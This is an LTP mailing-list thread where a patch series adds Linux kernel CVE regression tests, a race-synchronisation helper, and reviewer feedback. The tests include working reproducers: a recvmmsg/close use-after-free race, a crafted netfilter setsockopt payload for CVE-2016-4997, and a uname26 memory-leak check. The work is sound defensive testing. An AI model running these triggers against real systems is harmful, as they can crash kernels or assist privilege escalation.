[LTP] [PATCH v3 0/9] CVE Tests

[LTP] [PATCH v3 0/9] CVE Tests

[Richard Palethorpe]

Version 3:
* Move .gitignore and runtest additions to correct commits
* Replace tst_fzsync_init() with static declaration
* Remove packet time stamping test cve-2017-7277
* Remove explicit tid struct members
* Use new SAFE_SHM* macros
* Add Xiao Yang/Fujitsu to copyright notice for CVE-2017-5669

Version 2:
* Remove unresolved merge conflict from two commits
* Use _GNU_SOURCE instead of __USE_GNU

Richard Palethorpe (9):
  Add fuzzy synchronisation library for triggering races
  Test for vulnerability CVE-2016-7117 in recvmmsg error return path
  Test for CVE-2016-4997 on setsockopt
  Test for uname26 exploit CVE-2012-0957
  Add CVE .gitignore, Makefile and runtest files
  Test for CVE-2014-0196 PTY echo race
  Test for CVE-2017-5669 in shmat
  Test for CVE-2017-6951 in request_key
  Test for CVE-2017-2671 on ping sockets

 configure.ac                  |   2 +
 include/tst_fuzzy_sync.h      | 184 ++++++++++++++++++++++++++++++++++++++++++
 m4/ltp-mmsghdr.m4             |  22 +++++
 m4/ltp-uname.m4               |  20 +++++
 runtest/cve                   |   9 +++
 runtest/syscalls              |   4 +
 scenario_groups/default       |   1 +
 testcases/cve/.gitignore      |   7 ++
 testcases/cve/Makefile        |  26 ++++++
 testcases/cve/cve-2012-0957.c |  89 ++++++++++++++++++++
 testcases/cve/cve-2014-0196.c | 161 ++++++++++++++++++++++++++++++++++++
 testcases/cve/cve-2016-4997.c |  92 +++++++++++++++++++++
 testcases/cve/cve-2016-7117.c | 158 ++++++++++++++++++++++++++++++++++++
 testcases/cve/cve-2017-2671.c | 120 +++++++++++++++++++++++++++
 testcases/cve/cve-2017-5669.c |  88 ++++++++++++++++++++
 testcases/cve/cve-2017-6951.c |  46 +++++++++++
 16 files changed, 1029 insertions(+)
 create mode 100644 include/tst_fuzzy_sync.h
 create mode 100644 m4/ltp-mmsghdr.m4
 create mode 100644 m4/ltp-uname.m4
 create mode 100644 runtest/cve
 create mode 100644 testcases/cve/.gitignore
 create mode 100644 testcases/cve/Makefile
 create mode 100644 testcases/cve/cve-2012-0957.c
 create mode 100644 testcases/cve/cve-2014-0196.c
 create mode 100644 testcases/cve/cve-2016-4997.c
 create mode 100644 testcases/cve/cve-2016-7117.c
 create mode 100644 testcases/cve/cve-2017-2671.c
 create mode 100644 testcases/cve/cve-2017-5669.c
 create mode 100644 testcases/cve/cve-2017-6951.c

-- 
2.12.2

[LTP] [PATCH v3 1/9] Add fuzzy synchronisation library for triggering races

[Richard Palethorpe]

Provide some functions for starting two actions at approximately the same time
on different threads or processes. This is intended to amalgamate
functionality built into at least three CVE tests. As well as conforming to
DRY it is intended to help make reasoning about each test easier by
abstracting away the synchronisation mechanism.

Signed-off-by: Richard Palethorpe <rpalethorpe@suse.com>
---
 include/tst_fuzzy_sync.h | 184 +++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 184 insertions(+)
 create mode 100644 include/tst_fuzzy_sync.h

diff --git a/include/tst_fuzzy_sync.h b/include/tst_fuzzy_sync.h
new file mode 100644
index 000000000..122a6d736
--- /dev/null
+++ b/include/tst_fuzzy_sync.h
@@ -0,0 +1,184 @@
+/*
+ * Copyright (c) 2017 Richard Palethorpe <rpalethorpe@suse.com>
+ *
+ * This program is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 2 of the License, or
+ * (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program. If not, see <http://www.gnu.org/licenses/>.
+ */
+/*
+ * Fuzzy Synchronisation - abreviated to fzsync
+ *
+ * This library is intended to help reproduce race conditions while running in
+ * a loop. You can use it to measure the time at which two functions are
+ * called in different threads. Then calculate the average time gap between
+ * the function calls and introduce a delay in one thread to synchronise the
+ * calls.
+ *
+ * It is called 'fuzzy' synchronisation because the time gap will naturally vary
+ * due to environmental factors. It is not a 'hard' synchronisation mechanism
+ * like lockstepping.
+ *
+ * For a usage example see testcases/cve/cve-2017-2671.c
+ */
+
+#include <sys/time.h>
+#include <time.h>
+
+#ifndef CLOCK_MONOTONIC_RAW
+#define CLOCK_MONOTONIC_RAW CLOCK_MONOTONIC
+#endif
+
+/**
+ * struct tst_fzsync_pair - the state of a two way synchronisation
+ * @avg_diff: The average time difference over multiple iterations
+ * @avg_diff_trgt: The desired average time difference, defaults to 0
+ * @avg_alpha: The rate at which old diff samples are forgotten,
+ *             defaults to 0.25
+ * @a: The time at which call site A was last passed
+ * @b: The time at which call site B was last passed
+ * @delay: The size of the delay, positive to delay A, negative to delay B
+ * @delay_inc: The step size of a delay increment, defaults to 10
+ * @update_gap: The number of iterations between recalculating the delay.
+ *              Defaults to 0xF and must be of the form $2^n - 1$
+ *
+ * This contains all the necessary state for synchronising two points A and
+ * B. Where A is the time of an event in one process and B is the time of an
+ * event in another process.
+ */
+struct tst_fzsync_pair {
+	double avg_diff;
+	double avg_diff_trgt;
+	double avg_alpha;
+	struct timespec a;
+	struct timespec b;
+	long delay;
+	long delay_inc;
+	int update_gap;
+};
+
+/**
+ * TST_FZSYNC_PAIR_INIT - Default values for struct tst_fzysnc_pair
+ */
+#define TST_FZSYNC_PAIR_INIT {	\
+	.avg_alpha = 0.25,	\
+	.delay_inc = 10,	\
+	.update_gap = 0xF	\
+}
+
+static void tst_fzsync_pair_info(struct tst_fzsync_pair *pair)
+{
+	tst_res(TINFO, "avg_diff = %.5gns, delay = %05ld loops",
+		pair->avg_diff, pair->delay);
+}
+
+/**
+ * tst_fzsync_delay_a - Perform spin delay for A, if needed
+ *
+ * Usually called just before the point you want to synchronise.
+ */
+static inline void tst_fzsync_delay_a(struct tst_fzsync_pair *pair)
+{
+	volatile long spin_delay = pair->delay;
+
+	while (spin_delay > 0)
+		spin_delay--;
+}
+
+/**
+ * tst_fzsync_delay_b - Perform spin delay for B, if needed
+ *
+ * Usually called just before the point you want to synchronise.
+ */
+static inline void tst_fzsync_delay_b(struct tst_fzsync_pair *pair)
+{
+	volatile long spin_delay = pair->delay;
+
+	while (spin_delay < 0)
+		spin_delay++;
+}
+
+static inline void tst_fzsync_time(struct timespec *t)
+{
+	clock_gettime(CLOCK_MONOTONIC_RAW, t);
+}
+
+/**
+ * tst_fzsync_time_a - Set A's time to now.
+ *
+ * Called@the point you want to synchronise.
+ */
+static inline void tst_fzsync_time_a(struct tst_fzsync_pair *pair)
+{
+	tst_fzsync_time(&pair->a);
+}
+
+/**
+ * tst_fzsync_time_b - Set B's call time to now.
+ *
+ * Called at the point you want to synchronise.
+ */
+static inline void tst_fzsync_time_b(struct tst_fzsync_pair *pair)
+{
+	tst_fzsync_time(&pair->b);
+}
+
+/**
+ * tst_exp_moving_avg - Exponential moving average
+ * @alpha: The preference for receant samples over old ones.
+ * @sample: The current sample
+ * @prev_avg: The average of the all the previous samples
+ *
+ * Returns average including the current sample.
+ */
+static inline double tst_exp_moving_avg(double alpha, long sample,
+					double prev_avg)
+{
+	return alpha * sample + (1.0 - alpha) * prev_avg;
+}
+
+/**
+ * tst_fzsync_pair_update - Recalculate the delay
+ * @loop_index: The i in "for(i = 0;..." or zero to ignore update_gap
+ * @pair: The state necessary for calculating the delay
+ *
+ * This should be called at the end of each loop to update the average
+ * measured time difference (between A and B) and update the delay. It is
+ * assumed that A and B are less than a second apart.
+ *
+ * The values of update_gap, avg_alpha and delay_inc decide the speed at which
+ * the algorithm approaches the optimum delay value and whether it is
+ * stable. If your test is behaving strangely, it could be because this
+ * algorithm is behaving chaotically and flip-flopping between large positve
+ * and negative delay values. You can call tst_fzysync_pair_info every few
+ * loops to check whether the average difference and delay values are stable.
+ */
+static void tst_fzsync_pair_update(int loop_index, struct tst_fzsync_pair *pair)
+{
+	long diff;
+	long inc = pair->delay_inc;
+	long delay = pair->delay;
+	double target = pair->avg_diff_trgt;
+	double avg = pair->avg_diff;
+
+	diff = pair->a.tv_nsec - pair->b.tv_nsec;
+	avg = tst_exp_moving_avg(pair->avg_alpha, diff, avg);
+
+	if (!(loop_index & pair->update_gap)) {
+		if (avg > target)
+			delay -= inc;
+		else if (avg < target)
+			delay += inc;
+	}
+
+	pair->avg_diff = avg;
+	pair->delay = delay;
+}
-- 
2.12.2

[LTP] [PATCH v3 1/9] Add fuzzy synchronisation library for triggering races

[Cyril Hrubis]

Hi!
Pushed with minor changes (see diff below), thanks.

diff --git a/include/tst_fuzzy_sync.h b/include/tst_fuzzy_sync.h
index 122a6d736..229217495 100644
--- a/include/tst_fuzzy_sync.h
+++ b/include/tst_fuzzy_sync.h
@@ -34,7 +34,7 @@
 #include <time.h>
 
 #ifndef CLOCK_MONOTONIC_RAW
-#define CLOCK_MONOTONIC_RAW CLOCK_MONOTONIC
+# define CLOCK_MONOTONIC_RAW CLOCK_MONOTONIC
 #endif
 
 /**
@@ -133,7 +133,7 @@ static inline void tst_fzsync_time_b(struct tst_fzsync_pair *pair)
 
 /**
  * tst_exp_moving_avg - Exponential moving average
- * @alpha: The preference for receant samples over old ones.
+ * @alpha: The preference for recent samples over old ones.
  * @sample: The current sample
  * @prev_avg: The average of the all the previous samples
  *
@@ -165,7 +165,6 @@ static void tst_fzsync_pair_update(int loop_index, struct tst_fzsync_pair *pair)
 {
        long diff;
        long inc = pair->delay_inc;
-       long delay = pair->delay;
        double target = pair->avg_diff_trgt;
        double avg = pair->avg_diff;
 
@@ -174,11 +173,10 @@ static void tst_fzsync_pair_update(int loop_index, struct tst_fzsync_pair *pair)
 
        if (!(loop_index & pair->update_gap)) {
                if (avg > target)
-                       delay -= inc;
+                       pair->delay -= inc;
                else if (avg < target)
-                       delay += inc;
+                       pair->delay += inc;
        }
 
        pair->avg_diff = avg;
-       pair->delay = delay;
 }

Apart from fixing obvious typo and minor style issue I've changed this function
not to tuch the pair->delay unless we recalculated it, as the code is a bit
easier to understand that way.

-- 
Cyril Hrubis
chrubis@suse.cz

[LTP] [PATCH v3 1/9] Add fuzzy synchronisation library for triggering races

[Richard Palethorpe]

So, I have had some feedback on the synchronisation library from Nicolai
Stange and there are few things which can be fixed or improved. I can't
necessarily do them straight away so I will list some of them here.

* Make the target (offset) time a range instead of a scalar value.
* Make target offset relative to CPU speed.
* Take tv_sec into account for when we are close to rolling from one
  second to the next.
* Use two long running threads instead of starting the second thread
  each iteration.

The target offset would be better as a range which we can slide over
until the right timing is found. However the appropriate time range will
be different for one system to the next, so this range should be
normalised or we could generate it based on the time a relevant syscall
takes to execute.

Just using the nano seconds from the timespec will result in occasional
errors when the two timestamps are taken on either side of the boundary
between two seconds e.g. a = 0.9999 and b = 1.0001.

Finally, we currently spin up a new child thread every
iteration. However we could have two long running threads, or processes,
which we synchronise every iteration using a second synchronisation
primitive (The fork synchronisation library in LTP may already be
suitable for this). This may reduce the variability between iterations.

--
Thank you,
Richard.

[LTP] [PATCH v3 2/9] Test for vulnerability CVE-2016-7117 in recvmmsg error return path

[Richard Palethorpe]

Signed-off-by: Richard Palethorpe <rpalethorpe@suse.com>
---
 configure.ac                  |   1 +
 m4/ltp-mmsghdr.m4             |  22 ++++++
 testcases/cve/cve-2016-7117.c | 158 ++++++++++++++++++++++++++++++++++++++++++
 3 files changed, 181 insertions(+)
 create mode 100644 m4/ltp-mmsghdr.m4
 create mode 100644 testcases/cve/cve-2016-7117.c

diff --git a/configure.ac b/configure.ac
index cbe01d34f..326da8ece 100644
--- a/configure.ac
+++ b/configure.ac
@@ -192,5 +192,6 @@ LTP_CHECK_EPOLL_PWAIT
 LTP_CHECK_KEYUTILS_SUPPORT
 LTP_CHECK_SYNC_ADD_AND_FETCH
 LTP_CHECK_BUILTIN_CLEAR_CACHE
+LTP_CHECK_MMSGHDR
 
 AC_OUTPUT
diff --git a/m4/ltp-mmsghdr.m4 b/m4/ltp-mmsghdr.m4
new file mode 100644
index 000000000..05522180e
--- /dev/null
+++ b/m4/ltp-mmsghdr.m4
@@ -0,0 +1,22 @@
+dnl Copyright (c) 2017 Richard Palethorpe <rpalethorpe@suse.com>
+dnl
+dnl This program is free software;  you can redistribute it and/or modify
+dnl it under the terms of the GNU General Public License as published by
+dnl the Free Software Foundation; either version 2 of the License, or
+dnl (at your option) any later version.
+dnl
+dnl This program is distributed in the hope that it will be useful,
+dnl but WITHOUT ANY WARRANTY;  without even the implied warranty of
+dnl MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See
+dnl the GNU General Public License for more details.
+dnl
+dnl You should have received a copy of the GNU General Public License
+dnl along with this program. If not, see <http://www.gnu.org/licenses/>.
+
+AC_DEFUN([LTP_CHECK_MMSGHDR],[
+AC_CHECK_TYPES([struct mmsghdr],,,[
+#define _GNU_SOURCE
+#include <sys/types.h>
+#include <sys/socket.h>
+])
+])
diff --git a/testcases/cve/cve-2016-7117.c b/testcases/cve/cve-2016-7117.c
new file mode 100644
index 000000000..25937edd1
--- /dev/null
+++ b/testcases/cve/cve-2016-7117.c
@@ -0,0 +1,158 @@
+/*
+ * Copyright (c) 2017 Richard Palethorpe <rpalethorpe@suse.com>
+ *
+ * This program is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 2 of the License, or
+ * (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program. If not, see <http://www.gnu.org/licenses/>.
+ */
+/*
+ * CVE-2016-7117
+ *
+ * This tests for a use after free caused by a race between recvmmsg() and
+ * close(). The exit path for recvmmsg() in (a2e2725541f: net: Introduce
+ * recvmmsg socket syscall) called fput() on the active file descriptor before
+ * checking the error state and setting the socket's error field.
+ *
+ * If one or more messages are received by recvmmsg() followed by one which
+ * fails, the socket's error field will be set. If just after recvmmsg() calls
+ * fput(), a call to close() is made on the same file descriptor there is a
+ * race between close() releasing the socket object and recvmmsg() setting its
+ * error field.
+ *
+ * fput() does not release a file descriptor's resources (e.g. a socket)
+ * immediatly, it queues them to be released just before a system call returns
+ * to user land. So the close() system call must call fput() after it is
+ * called in recvmmsg(), exit and release the resources all before the socket
+ * error is set.
+ *
+ * Usually if the vulnerability is present the test will be killed with a
+ * kernel null pointer exception. However this is not guaranteed to happen
+ * every time.
+ *
+ * The following was used for reference
+ * https://blog.lizzie.io/notes-about-cve-2016-7117.html
+ */
+
+#include <sys/wait.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <sys/syscall.h>
+#include <stdlib.h>
+#include <errno.h>
+
+#include "tst_test.h"
+#include "tst_safe_net.h"
+#include "tst_safe_pthread.h"
+#include "tst_timer.h"
+#include "tst_fuzzy_sync.h"
+
+/* The bug was present in the kernel before recvmmsg was exposed by glibc */
+#include "linux_syscall_numbers.h"
+
+#define MSG "abcdefghijklmnop"
+#define RECV_TIMEOUT 1
+#define ATTEMPTS 0x1FFFFF
+
+#ifndef HAVE_STRUCT_MMSGHDR
+struct mmsghdr {
+	struct msghdr msg_hdr;
+	unsigned int msg_len;
+};
+#endif
+
+static int socket_fds[2];
+static struct mmsghdr msghdrs[2] = {
+	{
+		.msg_hdr = {
+			.msg_iov = &(struct iovec) {
+				.iov_len = sizeof(MSG),
+			},
+			.msg_iovlen = 1
+		}
+	},
+	{
+		.msg_hdr = {
+			.msg_iov = &(struct iovec) {
+				.iov_base = (void *)(0xbadadd),
+				.iov_len = ~0,
+			},
+			.msg_iovlen = 1
+		}
+	}
+};
+static char rbuf[sizeof(MSG)];
+static struct timespec timeout = { .tv_sec = RECV_TIMEOUT };
+static struct tst_fzsync_pair fzsync_pair = TST_FZSYNC_PAIR_INIT;
+
+static void cleanup(void)
+{
+	close(socket_fds[0]);
+	close(socket_fds[1]);
+}
+
+static void *send_and_close(void *arg)
+{
+	send(socket_fds[0], MSG, sizeof(MSG), 0);
+	send(socket_fds[0], MSG, sizeof(MSG), 0);
+
+	tst_fzsync_delay_b(&fzsync_pair);
+
+	close(socket_fds[0]);
+	close(socket_fds[1]);
+	tst_fzsync_time_b(&fzsync_pair);
+
+	return arg;
+}
+
+static void run(void)
+{
+	pthread_t pt_send;
+	int i, stat, too_early_count = 0;
+
+	msghdrs[0].msg_hdr.msg_iov->iov_base = (void *)&rbuf;
+
+	for (i = 1; i < ATTEMPTS; i++) {
+		if (socketpair(AF_LOCAL, SOCK_DGRAM, 0, socket_fds))
+			tst_brk(TBROK | TERRNO, "Socket creation failed");
+
+		SAFE_PTHREAD_CREATE(&pt_send, 0, send_and_close, 0);
+
+		tst_fzsync_delay_a(&fzsync_pair);
+
+		stat = tst_syscall(__NR_recvmmsg,
+				   socket_fds[1], msghdrs, 2, 0, &timeout);
+		tst_fzsync_time_a(&fzsync_pair);
+		if (stat < 0 && errno == EBADF)
+			too_early_count++;
+		else if (stat == 0)
+			tst_res(TWARN, "No messages received, should be one");
+		else if (stat < 0)
+			tst_res(TWARN | TERRNO, "recvmmsg failed unexpectedly");
+
+		SAFE_PTHREAD_JOIN(pt_send, 0);
+
+		tst_fzsync_pair_update(i, &fzsync_pair);
+		if (!(i & 0x7FFFF)) {
+			tst_res(TINFO, "Too early: %.1f%%",
+				100 * too_early_count / (float)i);
+			tst_fzsync_pair_info(&fzsync_pair);
+		}
+	}
+
+	tst_res(TPASS, "Nothing happened after %d attempts", ATTEMPTS);
+}
+
+static struct tst_test test = {
+	.test_all = run,
+	.cleanup = cleanup,
+	.min_kver = "2.6.33",
+};
-- 
2.12.2

[LTP] [PATCH v3 2/9] Test for vulnerability CVE-2016-7117 in recvmmsg error return path

[Cyril Hrubis]

Hi!
I've added a #include "config.h" to the test to include the config
created by configure explicitly. At the moment it's included via one
of the headers included from the tst_test.h but that may change in the
future.

Also when I tried to run the test my too early percentage seems to start
at a pretty low number then climbs to nearly 100% steadily, which seems
to be strange since the delay is more or less the same all the time. I
will look into this later if time permits.

-- 
Cyril Hrubis
chrubis@suse.cz

[LTP] [PATCH v3 3/9] Test for CVE-2016-4997 on setsockopt

[Richard Palethorpe]

Signed-off-by: Richard Palethorpe <rpalethorpe@suse.com>
---
 testcases/cve/cve-2016-4997.c | 92 +++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 92 insertions(+)
 create mode 100644 testcases/cve/cve-2016-4997.c

diff --git a/testcases/cve/cve-2016-4997.c b/testcases/cve/cve-2016-4997.c
new file mode 100644
index 000000000..a413b561e
--- /dev/null
+++ b/testcases/cve/cve-2016-4997.c
@@ -0,0 +1,92 @@
+/*
+ * Copyright (c) 2017 Richard Palethorpe <rpalethorpe@suse.com>
+ * Based on repro-compatReleaseEntry.c by NCC group
+ *
+ * This program is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 2 of the License, or
+ * (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program. If not, see <http://www.gnu.org/licenses/>.
+ */
+/*
+ * Test for CVE-2016-4997
+ *
+ * For a full explanation of how the vulnerability works see:
+ * https://github.com/nccgroup/TriforceLinuxSyscallFuzzer/tree/master/crash_reports/report_compatIpt
+ *
+ * The original vulnerability was present in the 32-bit compatibility system
+ * call, so the test should be compiled with -m32 and run on a 64-bit kernel.
+ * For simplicities sake the test requests root privliges instead of creating
+ * a user namespace.
+ */
+
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <net/if.h>
+#include <limits.h>
+#include <linux/netfilter_ipv4/ip_tables.h>
+
+#include "tst_test.h"
+#include "tst_safe_net.h"
+#include "tst_kernel.h"
+
+#define TOO_SMALL_OFFSET 74
+#define OFFSET_OVERWRITE 0xFFFF
+#define NEXT_OFFSET (sizeof(struct ipt_entry)		\
+		     + sizeof(struct xt_entry_match)	\
+		     + sizeof(struct xt_entry_target))
+#define PADDING (OFFSET_OVERWRITE - NEXT_OFFSET)
+
+struct payload {
+	struct ipt_replace repl;
+	struct ipt_entry ent;
+	struct xt_entry_match match;
+	struct xt_entry_target targ;
+	char padding[PADDING];
+	struct xt_entry_target targ2;
+};
+
+static void setup(void)
+{
+	if (tst_kernel_bits() == 32 || sizeof(long) > 4)
+		tst_res(TCONF,
+			"The vulnerability was only present in 32-bit compat mode");
+}
+
+static void run(void)
+{
+	int ret, sock_fd;
+	struct payload p = { 0 };
+
+	sock_fd = SAFE_SOCKET(AF_INET, SOCK_DGRAM, 0);
+
+	strncpy(p.match.u.user.name, "icmp", sizeof(p.match.u.user.name));
+	p.match.u.match_size = OFFSET_OVERWRITE;
+
+	p.ent.next_offset = NEXT_OFFSET;
+	p.ent.target_offset = TOO_SMALL_OFFSET;
+
+	p.repl.num_entries = 2;
+	p.repl.num_counters = 1;
+	p.repl.size = sizeof(struct payload);
+	p.repl.valid_hooks = 0;
+
+	ret = setsockopt(sock_fd, SOL_IP, IPT_SO_SET_REPLACE,
+			 &p, sizeof(struct payload));
+	tst_res(TPASS | TERRNO, "We didn't cause a crash, setsockopt returned %d", ret);
+}
+
+static struct tst_test test = {
+	.min_kver = "2.6.32",
+	.setup = setup,
+	.test_all = run,
+	.needs_root = 1,
+};
-- 
2.12.2

[LTP] [PATCH v3 3/9] Test for CVE-2016-4997 on setsockopt

[Cyril Hrubis]

Hi!
Applied, thanks.

BTW: I will try to resurrect the 32bit library LTP patch so that we can
     make use of it here.

-- 
Cyril Hrubis
chrubis@suse.cz

[LTP] [PATCH v3 3/9] Test for CVE-2016-4997 on setsockopt

[Petr Vorel]

Hi Richard, Cyril,

looking at this LTP test (3be0d391f renamed it into
testcases/kernel/syscalls/setsockopt/setsockopt03.c).


> Signed-off-by: Richard Palethorpe <rpalethorpe@suse.com>
> ---
>  testcases/cve/cve-2016-4997.c | 92 +++++++++++++++++++++++++++++++++++++++++++

...
> +static void setup(void)
> +{
> +	if (tst_kernel_bits() == 32 || sizeof(long) > 4)
> +		tst_res(TCONF,
> +			"The vulnerability was only present in 32-bit compat mode");
Was it intentional to run it on normal 64bit?
Shouldn't it be tst_brk(TCONF, ...) used?

Kind regards,
Petr

> +}
> +
> +static void run(void)
> +{
> +	int ret, sock_fd;
> +	struct payload p = { 0 };
> +
> +	sock_fd = SAFE_SOCKET(AF_INET, SOCK_DGRAM, 0);
> +
> +	strncpy(p.match.u.user.name, "icmp", sizeof(p.match.u.user.name));
> +	p.match.u.match_size = OFFSET_OVERWRITE;
> +
> +	p.ent.next_offset = NEXT_OFFSET;
> +	p.ent.target_offset = TOO_SMALL_OFFSET;
> +
> +	p.repl.num_entries = 2;
> +	p.repl.num_counters = 1;
> +	p.repl.size = sizeof(struct payload);
> +	p.repl.valid_hooks = 0;
> +
> +	ret = setsockopt(sock_fd, SOL_IP, IPT_SO_SET_REPLACE,
> +			 &p, sizeof(struct payload));
> +	tst_res(TPASS | TERRNO, "We didn't cause a crash, setsockopt returned %d", ret);
> +}
> +
> +static struct tst_test test = {
> +	.min_kver = "2.6.32",
> +	.setup = setup,
> +	.test_all = run,
> +	.needs_root = 1,
> +};

[LTP] [PATCH v3 4/9] Test for uname26 exploit CVE-2012-0957

[Richard Palethorpe]

Attempt to exploit the uname kernel memory leak which occurred when the
UNAME26 personality was set.

Signed-off-by: Richard Palethorpe <rpalethorpe@suse.com>
---
 configure.ac                  |  1 +
 m4/ltp-uname.m4               | 20 ++++++++++
 testcases/cve/cve-2012-0957.c | 89 +++++++++++++++++++++++++++++++++++++++++++
 3 files changed, 110 insertions(+)
 create mode 100644 m4/ltp-uname.m4
 create mode 100644 testcases/cve/cve-2012-0957.c

diff --git a/configure.ac b/configure.ac
index 326da8ece..658003972 100644
--- a/configure.ac
+++ b/configure.ac
@@ -193,5 +193,6 @@ LTP_CHECK_KEYUTILS_SUPPORT
 LTP_CHECK_SYNC_ADD_AND_FETCH
 LTP_CHECK_BUILTIN_CLEAR_CACHE
 LTP_CHECK_MMSGHDR
+LTP_CHECK_UNAME_DOMAINNAME
 
 AC_OUTPUT
diff --git a/m4/ltp-uname.m4 b/m4/ltp-uname.m4
new file mode 100644
index 000000000..5a3002200
--- /dev/null
+++ b/m4/ltp-uname.m4
@@ -0,0 +1,20 @@
+dnl Copyright (c) 2017 Richard Palethorpe <rpalethorpe@suse.com>
+dnl
+dnl This program is free software;  you can redistribute it and/or modify
+dnl it under the terms of the GNU General Public License as published by
+dnl the Free Software Foundation; either version 2 of the License, or
+dnl (at your option) any later version.
+dnl
+dnl This program is distributed in the hope that it will be useful,
+dnl but WITHOUT ANY WARRANTY;  without even the implied warranty of
+dnl MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See
+dnl the GNU General Public License for more details.
+dnl
+dnl You should have received a copy of the GNU General Public License
+dnl along with this program. If not, see <http://www.gnu.org/licenses/>.
+
+AC_DEFUN([LTP_CHECK_UNAME_DOMAINNAME],[
+AC_CHECK_MEMBERS([struct utsname.domainname],,,[
+#define _GNU_SOURCE
+#include <sys/utsname.h>
+])])
diff --git a/testcases/cve/cve-2012-0957.c b/testcases/cve/cve-2012-0957.c
new file mode 100644
index 000000000..f065735a1
--- /dev/null
+++ b/testcases/cve/cve-2012-0957.c
@@ -0,0 +1,89 @@
+/*
+ * Copyright (c) 2017 Richard Palethorpe <rpalethorpe@suse.com>
+ * Copyright (c) 2012, Kees Cook <keescook@chromium.org>
+ *
+ * This program is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 2 of the License, or
+ * (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program. If not, see <http://www.gnu.org/licenses/>.
+ */
+/*
+ * Check that memory after the string terminator in all the utsname fields has
+ * been zeroed. cve-2012-0957 leaked kernel memory through the release field
+ * when the UNAME26 personality was set.
+ *
+ * Thanks to Kees Cook for the original proof of concept:
+ * http://www.securityfocus.com/bid/55855/info
+ */
+
+#include <string.h>
+#include <sys/utsname.h>
+#include <sys/personality.h>
+#include "tst_test.h"
+
+#define UNAME26 0x0020000
+
+static int check_field(char *bytes, size_t length, char *field)
+{
+	size_t i = strlen(bytes) + 1;
+
+	for (; i < length; i++) {
+		if (bytes[i]) {
+			tst_res(TFAIL, "Bytes leaked in %s!", field);
+			return 1;
+		}
+	}
+	return 0;
+}
+
+
+static void try_leak_bytes(void)
+{
+	struct utsname buf;
+
+	if (uname(&buf))
+		tst_brk(TBROK | TERRNO, "Call to uname failed");
+
+#define CHECK_FIELD(field_name) \
+	(check_field(buf.field_name, ARRAY_SIZE(buf.field_name), #field_name))
+
+	if (!(CHECK_FIELD(release) |
+	    CHECK_FIELD(sysname) |
+	    CHECK_FIELD(nodename) |
+	    CHECK_FIELD(version) |
+	    CHECK_FIELD(machine) |
+#ifdef HAVE_STRUCT_UTSNAME_DOMAINNAME
+	    CHECK_FIELD(domainname) |
+#endif
+		    0)) {
+		tst_res(TPASS, "All fields zeroed after string terminator");
+	}
+#undef CHECK_FIELD
+}
+
+static void run(unsigned int test_nr)
+{
+	if (!test_nr) {
+		tst_res(TINFO, "Calling uname with default personality");
+		try_leak_bytes();
+	} else {
+		if (personality(PER_LINUX | UNAME26) < 0)
+			tst_brk(TCONF | TERRNO,
+				"Could not change personality to UNAME26");
+		tst_res(TINFO, "Calling uname with UNAME26 personality");
+		try_leak_bytes();
+	}
+}
+
+static struct tst_test test = {
+	.test = run,
+	.tcnt = 2,
+};
-- 
2.12.2

[LTP] [PATCH v3 4/9] Test for uname26 exploit CVE-2012-0957

[Cyril Hrubis]

> Attempt to exploit the uname kernel memory leak which occurred when the
> UNAME26 personality was set.
> 
> Signed-off-by: Richard Palethorpe <rpalethorpe@suse.com>
> ---
>  configure.ac                  |  1 +
>  m4/ltp-uname.m4               | 20 ++++++++++
>  testcases/cve/cve-2012-0957.c | 89 +++++++++++++++++++++++++++++++++++++++++++
>  3 files changed, 110 insertions(+)
>  create mode 100644 m4/ltp-uname.m4
>  create mode 100644 testcases/cve/cve-2012-0957.c
> 
> diff --git a/configure.ac b/configure.ac
> index 326da8ece..658003972 100644
> --- a/configure.ac
> +++ b/configure.ac
> @@ -193,5 +193,6 @@ LTP_CHECK_KEYUTILS_SUPPORT
>  LTP_CHECK_SYNC_ADD_AND_FETCH
>  LTP_CHECK_BUILTIN_CLEAR_CACHE
>  LTP_CHECK_MMSGHDR
> +LTP_CHECK_UNAME_DOMAINNAME
>  
>  AC_OUTPUT
> diff --git a/m4/ltp-uname.m4 b/m4/ltp-uname.m4
> new file mode 100644
> index 000000000..5a3002200
> --- /dev/null
> +++ b/m4/ltp-uname.m4
> @@ -0,0 +1,20 @@
> +dnl Copyright (c) 2017 Richard Palethorpe <rpalethorpe@suse.com>
> +dnl
> +dnl This program is free software;  you can redistribute it and/or modify
> +dnl it under the terms of the GNU General Public License as published by
> +dnl the Free Software Foundation; either version 2 of the License, or
> +dnl (at your option) any later version.
> +dnl
> +dnl This program is distributed in the hope that it will be useful,
> +dnl but WITHOUT ANY WARRANTY;  without even the implied warranty of
> +dnl MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See
